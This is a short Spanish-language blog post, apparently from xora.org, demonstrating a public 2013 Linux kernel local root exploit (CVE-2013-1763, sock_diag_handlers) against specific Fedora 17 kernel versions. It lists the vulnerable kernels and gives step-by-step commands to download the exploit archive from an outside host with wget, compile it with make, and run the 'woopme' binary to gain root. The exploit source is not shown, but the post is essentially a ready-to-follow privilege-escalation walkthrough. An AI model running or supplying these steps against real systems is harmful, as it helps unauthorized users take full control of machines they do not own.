Fedora 17 Local Root Exploit [2013] CVE-2013-1763 sock_diag_handlers

Hace unos días se hizo publico un exploit que tenía unos meses ya funcionando, hasta que alguien lo hizo publico en Pastebin, en está ocasión lo pruebo, a pesar de que dice afectar las versiones del kernel del 3.3 a 3.8, no es del todo cierto.

La instalación por defecto de Fedora 17, tiene una versión del kernel NO vulnerable, la versión de Fedora 18 ya viene con una versión de Kernel superior a 3.8. Así que solo funciona con ciertas actualizaciones en Fedora 17.

La vulnerabilidad permite escalar privilegios a través de sock_diag_handlers[], las versiones exactas de Fedora que son vulnerables son:

• 00 Fedora Core 17 3.4.4-3.fc17.i686 #1
• 01 Fedora Core 17 3.5.2-3.fc17.i686 #1
• 02 Fedora Core 17 3.5.5-2.fc17.i686 #1

Para rootear estas versiones hacemos lo siguiente:

Descargamos el exploit, en una terminal ejectutamos:

wget http://xora.org/root/[2013]-sock_diag_handlers-3.3-3.79.zip

Extraemos y entramos a la carpeta

unzip [2013]-sock_diag_handlers-3.3-3.79.zip
cd [2013]-sock_diag_handlers-3.3-3.79

Fedora 17 Local Root Exploit

Para compilar necesitamos gcc, si no lo tienes instalado:

sudo yum install gcc

y ahora compilamos

make

y ejecutamos

./woopme 00

Sustituye 00 por la versión correspondiente [00, 01, 02]

Fedora 17 Local Root Exploit

Más información en:

• CVE-2013-1763 sock_diag_handlers Local Root Exploit Analysis
• Archlinux x86-64 3.3.x-3.7.x x86-64 sock_diag_handlers[] Local Root

Post para xora.org & evafedora.org.